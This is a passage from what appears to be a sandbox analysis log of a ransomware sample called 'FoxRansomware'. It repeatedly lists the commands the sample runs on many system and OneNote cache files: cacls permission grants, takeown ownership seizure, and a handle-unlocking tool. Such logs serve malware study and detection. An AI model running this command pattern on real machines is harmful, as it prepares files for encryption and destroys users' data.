C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "ActivitiesCache.db-shm" -nobanner4⤵PID:5840
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:6436
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:6304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:5480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:5308
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:5556
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:5716
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:7272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:3956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:6624
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:6644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl""2⤵PID:6044
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl"3⤵PID:3572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl" -nobanner3⤵PID:7568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl" -nobanner4⤵PID:3396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""2⤵PID:7060
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C3⤵PID:7008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"3⤵PID:7212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner3⤵PID:6796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner4⤵PID:6812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""2⤵PID:3200
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C3⤵PID:5272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"3⤵PID:5152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner3⤵PID:6784
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner4⤵PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""2⤵PID:7128
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C3⤵PID:8180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"3⤵
- Modifies file permissions
PID:6180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "RoamingCredentialSettings.xml" -nobanner3⤵PID:3964
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "RoamingCredentialSettings.xml" -nobanner4⤵PID:6392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:7768
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:7344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:7372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "background.png" -nobanner3⤵PID:6764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "background.png" -nobanner4⤵PID:5252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:5664
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:7832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵PID:7524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "tasks.xml" -nobanner3⤵PID:7516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "tasks.xml" -nobanner4⤵PID:3660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:4048
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:7624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Modifies file permissions
PID:7932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "behavior.xml" -nobanner3⤵PID:7416
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "behavior.xml" -nobanner4⤵PID:7668
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""2⤵PID:7596
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C3⤵PID:7928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"3⤵
- Modifies file permissions
PID:7880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000009.bin" -nobanner3⤵PID:7252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000009.bin" -nobanner4⤵PID:7920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""2⤵PID:7444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C3⤵PID:8172
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"3⤵PID:7520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000N.bin" -nobanner3⤵PID:7616
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000N.bin" -nobanner4⤵PID:7888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""2⤵PID:6836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C3⤵PID:7956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"3⤵PID:8144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000011.bin" -nobanner3⤵PID:7600
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000011.bin" -nobanner4⤵PID:8148
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:5436
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:8176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵PID:5816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:5820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:8064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:6020
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:8092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:2804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:4640
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:5952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""2⤵PID:1548
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C3⤵PID:5996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"3⤵PID:2000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner3⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner4⤵PID:2068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""2⤵PID:4948
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C3⤵PID:4476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"3⤵
- Modifies file permissions
PID:3016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner3⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner4⤵PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""2⤵PID:4284
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C3⤵PID:64
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"3⤵PID:1228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner3⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner4⤵PID:7040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""2⤵PID:3744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C3⤵PID:5888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"3⤵PID:5736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006D.bin" -nobanner3⤵PID:7176
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000006D.bin" -nobanner4⤵PID:2196
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin""2⤵PID:5680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin" /E /G Admin:F /C3⤵PID:4028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin"3⤵PID:6632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006N.bin" -nobanner3⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000006N.bin" -nobanner4⤵PID:5056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""2⤵PID:1748
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C3⤵PID:3784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"3⤵PID:4912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner3⤵PID:6092
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner4⤵PID:2924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""2⤵PID:4148
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C3⤵PID:6368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"3⤵PID:6312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner3⤵PID:6440
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner4⤵PID:7136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""2⤵PID:2220
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C3⤵PID:6460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"3⤵PID:5212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner3⤵PID:6488
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner4⤵PID:6380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:7256
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:5480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:5176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin""2⤵PID:6320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin" /E /G Admin:F /C3⤵PID:1256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin"3⤵PID:3728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007V.bin" -nobanner3⤵PID:296
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007V.bin" -nobanner4⤵PID:5320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin""2⤵PID:5408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin" /E /G Admin:F /C3⤵PID:7916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin"3⤵PID:6468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000089.bin" -nobanner3⤵PID:7028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000089.bin" -nobanner4⤵PID:5532
-
-
-
